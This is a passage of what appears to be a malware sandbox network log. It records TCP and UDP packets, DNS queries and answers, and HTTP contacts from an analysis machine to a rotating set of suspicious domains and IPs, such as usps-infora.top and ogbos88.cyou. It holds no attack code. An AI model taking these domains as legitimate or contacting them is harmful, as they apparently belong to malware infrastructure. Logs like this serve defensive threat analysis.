Jan 13, 2025 10:21:21.946882963 CET	80	50031	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:23.458252907 CET	50031	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:23.463232994 CET	80	50031	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:23.465576887 CET	50031	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:24.478506088 CET	50032	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:24.483478069 CET	80	50032	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:24.483586073 CET	50032	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:24.495415926 CET	50032	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:24.500298023 CET	80	50032	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:25.172451973 CET	80	50032	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:25.172534943 CET	80	50032	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:25.172683954 CET	50032	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:25.175415039 CET	50032	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:25.180591106 CET	80	50032	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:30.435045004 CET	50033	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:30.439990997 CET	80	50033	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:30.440053940 CET	50033	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:30.471219063 CET	50033	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:30.476326942 CET	80	50033	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:30.891829967 CET	80	50033	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:30.891875029 CET	80	50033	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:30.891912937 CET	80	50033	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:30.895680904 CET	50033	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:31.974905968 CET	50033	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:32.992636919 CET	50034	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:32.997687101 CET	80	50034	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:32.997795105 CET	50034	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:33.012820005 CET	50034	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:33.017745018 CET	80	50034	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:33.452137947 CET	80	50034	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:33.452184916 CET	80	50034	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:33.452224970 CET	80	50034	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:33.452280045 CET	50034	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:33.452280045 CET	50034	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:34.660180092 CET	50034	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:35.666551113 CET	50035	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:35.671492100 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:35.671613932 CET	50035	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:35.691648006 CET	50035	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:35.696696043 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:35.696727991 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:35.696782112 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:35.696810007 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:35.696862936 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:35.696891069 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:35.696918964 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:35.696950912 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:35.696978092 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:36.131838083 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:36.131860018 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:36.131877899 CET	80	50035	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:36.131921053 CET	50035	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:36.131968975 CET	50035	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:37.208260059 CET	50035	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:38.227741003 CET	50036	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:38.232698917 CET	80	50036	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:38.232774019 CET	50036	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:38.250113010 CET	50036	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:38.254939079 CET	80	50036	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:38.712024927 CET	80	50036	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:38.712049961 CET	80	50036	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:38.712081909 CET	80	50036	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:38.712172985 CET	50036	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:38.712214947 CET	50036	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:38.716788054 CET	50036	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:21:38.721602917 CET	80	50036	199.59.243.228	192.168.2.4
Jan 13, 2025 10:21:44.019714117 CET	50037	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:44.024522066 CET	80	50037	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:44.024622917 CET	50037	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:44.042407990 CET	50037	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:44.047204018 CET	80	50037	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:45.554645061 CET	50037	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:45.607187986 CET	80	50037	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:46.572864056 CET	50038	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:46.577759027 CET	80	50038	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:46.577843904 CET	50038	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:46.603822947 CET	50038	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:46.608711958 CET	80	50038	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:48.114872932 CET	50038	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:48.167521954 CET	80	50038	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:49.186963081 CET	50039	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:49.198997021 CET	80	50039	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:49.200623989 CET	50039	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:49.223630905 CET	50039	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:49.234289885 CET	80	50039	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:49.234302998 CET	80	50039	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:49.234319925 CET	80	50039	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:49.234328985 CET	80	50039	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:49.235272884 CET	80	50039	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:49.235281944 CET	80	50039	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:49.235356092 CET	80	50039	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:49.235364914 CET	80	50039	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:49.235373020 CET	80	50039	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:50.739578962 CET	50039	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:50.787199974 CET	80	50039	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:51.771760941 CET	50040	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:51.776545048 CET	80	50040	38.22.89.164	192.168.2.4
Jan 13, 2025 10:21:51.776987076 CET	50040	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:51.827770948 CET	50040	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:21:51.832581997 CET	80	50040	38.22.89.164	192.168.2.4
Jan 13, 2025 10:22:05.438368082 CET	80	50037	38.22.89.164	192.168.2.4
Jan 13, 2025 10:22:05.438684940 CET	50037	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:22:07.918448925 CET	80	50038	38.22.89.164	192.168.2.4
Jan 13, 2025 10:22:07.918499947 CET	50038	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:22:10.596115112 CET	80	50039	38.22.89.164	192.168.2.4
Jan 13, 2025 10:22:10.596255064 CET	50039	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:22:13.140486002 CET	80	50040	38.22.89.164	192.168.2.4
Jan 13, 2025 10:22:13.142898083 CET	50040	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:22:13.145649910 CET	50040	80	192.168.2.4	38.22.89.164
Jan 13, 2025 10:22:13.150512934 CET	80	50040	38.22.89.164	192.168.2.4
Jan 13, 2025 10:22:18.174619913 CET	50041	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:18.179439068 CET	80	50041	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:18.179507017 CET	50041	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:18.201894045 CET	50041	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:18.206756115 CET	80	50041	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:19.123142004 CET	80	50041	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:19.123167038 CET	80	50041	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:19.123297930 CET	80	50041	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:19.123445034 CET	50041	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:19.710647106 CET	50041	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:20.728368044 CET	50042	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:20.733274937 CET	80	50042	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:20.733361959 CET	50042	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:20.753727913 CET	50042	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:20.758780956 CET	80	50042	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:21.584534883 CET	80	50042	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:21.584578991 CET	80	50042	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:21.584686041 CET	50042	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:21.584903002 CET	80	50042	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:21.585097075 CET	50042	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:22.255260944 CET	50042	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:23.333542109 CET	50043	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:23.338495016 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:23.338723898 CET	50043	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:23.389830112 CET	50043	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:23.394731998 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:23.394850969 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:23.394866943 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:23.394893885 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:23.394908905 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:23.394925117 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:23.394938946 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:23.394964933 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:23.394979954 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:24.168641090 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:24.168668032 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:24.168694973 CET	80	50043	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:24.168710947 CET	50043	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:24.168768883 CET	50043	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:24.913155079 CET	50043	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:26.254404068 CET	50044	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:26.403584957 CET	80	50044	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:26.403733015 CET	50044	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:26.412976980 CET	50044	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:26.418005943 CET	80	50044	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:27.222404957 CET	80	50044	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:27.222455978 CET	80	50044	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:27.222498894 CET	80	50044	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:27.222582102 CET	50044	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:27.222582102 CET	50044	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:27.226469994 CET	50044	80	192.168.2.4	68.65.122.71
Jan 13, 2025 10:22:27.231688023 CET	80	50044	68.65.122.71	192.168.2.4
Jan 13, 2025 10:22:50.276418924 CET	50045	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:50.281413078 CET	80	50045	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:50.281505108 CET	50045	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:50.300527096 CET	50045	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:50.305538893 CET	80	50045	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:51.061316013 CET	80	50045	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:51.061567068 CET	50045	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:51.802412033 CET	50045	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:51.807367086 CET	80	50045	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:52.821506023 CET	50046	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:52.826477051 CET	80	50046	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:52.826561928 CET	50046	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:52.839616060 CET	50046	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:52.844419956 CET	80	50046	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:53.603596926 CET	80	50046	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:53.606826067 CET	50046	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:54.349659920 CET	50046	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:54.480151892 CET	80	50046	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:55.368238926 CET	50047	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:55.373231888 CET	80	50047	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:55.376801968 CET	50047	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:55.391376019 CET	50047	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:55.391396999 CET	50047	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:55.396222115 CET	80	50047	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:55.396311045 CET	80	50047	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:55.396338940 CET	80	50047	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:55.396390915 CET	80	50047	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:55.396416903 CET	80	50047	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:55.396464109 CET	80	50047	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:55.396490097 CET	80	50047	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:55.396516085 CET	80	50047	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:55.396558046 CET	80	50047	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:56.176372051 CET	80	50047	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:56.176459074 CET	50047	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:56.896104097 CET	50047	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:56.904369116 CET	80	50047	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:57.914760113 CET	50048	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:57.920737982 CET	80	50048	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:57.920977116 CET	50048	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:57.930140018 CET	50048	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:57.936772108 CET	80	50048	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:58.700248003 CET	80	50048	103.174.136.137	192.168.2.4
Jan 13, 2025 10:22:58.700368881 CET	50048	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:58.893163919 CET	50048	80	192.168.2.4	103.174.136.137
Jan 13, 2025 10:22:58.900151968 CET	80	50048	103.174.136.137	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 10:19:26.020750999 CET	62715	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:19:26.029572964 CET	53	62715	1.1.1.1	192.168.2.4
Jan 13, 2025 10:19:31.039660931 CET	56253	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:19:31.305306911 CET	53	56253	1.1.1.1	192.168.2.4
Jan 13, 2025 10:19:46.836705923 CET	52103	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:19:46.953784943 CET	53	52103	1.1.1.1	192.168.2.4
Jan 13, 2025 10:19:55.008567095 CET	56387	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:19:55.023094893 CET	53	56387	1.1.1.1	192.168.2.4
Jan 13, 2025 10:20:08.337532043 CET	53669	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:20:08.493910074 CET	53	53669	1.1.1.1	192.168.2.4
Jan 13, 2025 10:20:22.618860006 CET	59104	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:20:22.664771080 CET	53	59104	1.1.1.1	192.168.2.4
Jan 13, 2025 10:20:36.306376934 CET	54255	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:20:36.318269014 CET	53	54255	1.1.1.1	192.168.2.4
Jan 13, 2025 10:20:49.665443897 CET	51376	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:20:49.677690983 CET	53	51376	1.1.1.1	192.168.2.4
Jan 13, 2025 10:21:02.964615107 CET	64458	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:21:03.074553967 CET	53	64458	1.1.1.1	192.168.2.4
Jan 13, 2025 10:21:16.493177891 CET	50687	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:21:16.821794987 CET	53	50687	1.1.1.1	192.168.2.4
Jan 13, 2025 10:21:30.181581020 CET	53672	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:21:30.432274103 CET	53	53672	1.1.1.1	192.168.2.4
Jan 13, 2025 10:21:43.733310938 CET	54039	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:21:44.016747952 CET	53	54039	1.1.1.1	192.168.2.4
Jan 13, 2025 10:22:18.149940968 CET	63002	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:22:18.171596050 CET	53	63002	1.1.1.1	192.168.2.4
Jan 13, 2025 10:22:32.243913889 CET	51344	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:22:32.252396107 CET	53	51344	1.1.1.1	192.168.2.4
Jan 13, 2025 10:22:40.305490971 CET	52229	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:22:40.314506054 CET	53	52229	1.1.1.1	192.168.2.4
Jan 13, 2025 10:22:48.369126081 CET	51210	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:22:49.365101099 CET	51210	53	192.168.2.4	1.1.1.1
Jan 13, 2025 10:22:50.273134947 CET	53	51210	1.1.1.1	192.168.2.4
Jan 13, 2025 10:22:50.273178101 CET	53	51210	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 10:19:26.020750999 CET	192.168.2.4	1.1.1.1	0x7d75	Standard query (0)	www.biocaracol.online	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:19:31.039660931 CET	192.168.2.4	1.1.1.1	0x1cec	Standard query (0)	www.zucchini.pro	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:19:46.836705923 CET	192.168.2.4	1.1.1.1	0x1e5f	Standard query (0)	www.yacolca.digital	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:19:55.008567095 CET	192.168.2.4	1.1.1.1	0xa488	Standard query (0)	www.ogbos88.cyou	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:20:08.337532043 CET	192.168.2.4	1.1.1.1	0x6901	Standard query (0)	www.esscosaathi.info	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:20:22.618860006 CET	192.168.2.4	1.1.1.1	0x6a75	Standard query (0)	www.myfastuploader.sbs	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:20:36.306376934 CET	192.168.2.4	1.1.1.1	0x918e	Standard query (0)	www.grimbo.boats	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:20:49.665443897 CET	192.168.2.4	1.1.1.1	0x9722	Standard query (0)	www.sesanu.xyz	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:02.964615107 CET	192.168.2.4	1.1.1.1	0x664c	Standard query (0)	www.sovz.pro	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:16.493177891 CET	192.168.2.4	1.1.1.1	0x6121	Standard query (0)	www.tabyscooterrentals.xyz	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:30.181581020 CET	192.168.2.4	1.1.1.1	0xb7a9	Standard query (0)	www.sql.dance	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:43.733310938 CET	192.168.2.4	1.1.1.1	0x2d71	Standard query (0)	www.811371bb10.buzz	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:18.149940968 CET	192.168.2.4	1.1.1.1	0xc6fc	Standard query (0)	www.rtp189z.lat	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:32.243913889 CET	192.168.2.4	1.1.1.1	0x45f5	Standard query (0)	www.glyttera.shop	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:40.305490971 CET	192.168.2.4	1.1.1.1	0xddb2	Standard query (0)	www.usps-infora.top	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:48.369126081 CET	192.168.2.4	1.1.1.1	0xdd30	Standard query (0)	www.u75lmwdgp0du.homes	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:49.365101099 CET	192.168.2.4	1.1.1.1	0xdd30	Standard query (0)	www.u75lmwdgp0du.homes	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 10:19:26.029572964 CET	1.1.1.1	192.168.2.4	0x7d75	Name error (3)	www.biocaracol.online	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:19:31.305306911 CET	1.1.1.1	192.168.2.4	0x1cec	No error (0)	www.zucchini.pro		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:19:46.953784943 CET	1.1.1.1	192.168.2.4	0x1e5f	Name error (3)	www.yacolca.digital	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:19:55.023094893 CET	1.1.1.1	192.168.2.4	0xa488	No error (0)	www.ogbos88.cyou		104.21.13.141	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:19:55.023094893 CET	1.1.1.1	192.168.2.4	0xa488	No error (0)	www.ogbos88.cyou		172.67.132.227	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:20:08.493910074 CET	1.1.1.1	192.168.2.4	0x6901	No error (0)	www.esscosaathi.info		15.197.240.20	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:20:22.664771080 CET	1.1.1.1	192.168.2.4	0x6a75	No error (0)	www.myfastuploader.sbs	myfastuploader.sbs		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 10:20:22.664771080 CET	1.1.1.1	192.168.2.4	0x6a75	No error (0)	myfastuploader.sbs		136.243.225.5	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:20:36.318269014 CET	1.1.1.1	192.168.2.4	0x918e	No error (0)	www.grimbo.boats		104.21.18.171	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:20:36.318269014 CET	1.1.1.1	192.168.2.4	0x918e	No error (0)	www.grimbo.boats		172.67.182.198	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:20:49.677690983 CET	1.1.1.1	192.168.2.4	0x9722	No error (0)	www.sesanu.xyz		199.192.21.169	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:03.074553967 CET	1.1.1.1	192.168.2.4	0x664c	No error (0)	www.sovz.pro		45.130.41.107	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:16.821794987 CET	1.1.1.1	192.168.2.4	0x6121	No error (0)	www.tabyscooterrentals.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 10:21:16.821794987 CET	1.1.1.1	192.168.2.4	0x6121	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 10:21:16.821794987 CET	1.1.1.1	192.168.2.4	0x6121	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:30.432274103 CET	1.1.1.1	192.168.2.4	0xb7a9	No error (0)	www.sql.dance		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:21:44.016747952 CET	1.1.1.1	192.168.2.4	0x2d71	No error (0)	www.811371bb10.buzz	ns91.l4y.cn		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 10:21:44.016747952 CET	1.1.1.1	192.168.2.4	0x2d71	No error (0)	ns91.l4y.cn		38.22.89.164	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:18.171596050 CET	1.1.1.1	192.168.2.4	0xc6fc	No error (0)	www.rtp189z.lat	rtp189z.lat		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 10:22:18.171596050 CET	1.1.1.1	192.168.2.4	0xc6fc	No error (0)	rtp189z.lat		68.65.122.71	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:32.252396107 CET	1.1.1.1	192.168.2.4	0x45f5	Name error (3)	www.glyttera.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:40.314506054 CET	1.1.1.1	192.168.2.4	0xddb2	Name error (3)	www.usps-infora.top	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:50.273134947 CET	1.1.1.1	192.168.2.4	0xdd30	No error (0)	www.u75lmwdgp0du.homes	tc142-site01.mac-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 10:22:50.273134947 CET	1.1.1.1	192.168.2.4	0xdd30	No error (0)	tc142-site01.mac-cdn.net		103.174.136.137	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:50.273134947 CET	1.1.1.1	192.168.2.4	0xdd30	No error (0)	tc142-site01.mac-cdn.net		103.174.137.130	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:50.273134947 CET	1.1.1.1	192.168.2.4	0xdd30	No error (0)	tc142-site01.mac-cdn.net		103.174.136.20	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:50.273178101 CET	1.1.1.1	192.168.2.4	0xdd30	No error (0)	www.u75lmwdgp0du.homes	tc142-site01.mac-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 10:22:50.273178101 CET	1.1.1.1	192.168.2.4	0xdd30	No error (0)	tc142-site01.mac-cdn.net		103.174.136.137	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:50.273178101 CET	1.1.1.1	192.168.2.4	0xdd30	No error (0)	tc142-site01.mac-cdn.net		103.174.137.130	A (IP address)	IN (0x0001)	false
Jan 13, 2025 10:22:50.273178101 CET	1.1.1.1	192.168.2.4	0xdd30	No error (0)	tc142-site01.mac-cdn.net		103.174.136.20	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.zucchini.pro

www.ogbos88.cyou

www.esscosaathi.info

www.myfastuploader.sbs

www.grimbo.boats

www.sesanu.xyz

www.sovz.pro

www.tabyscooterrentals.xyz

www.sql.dance

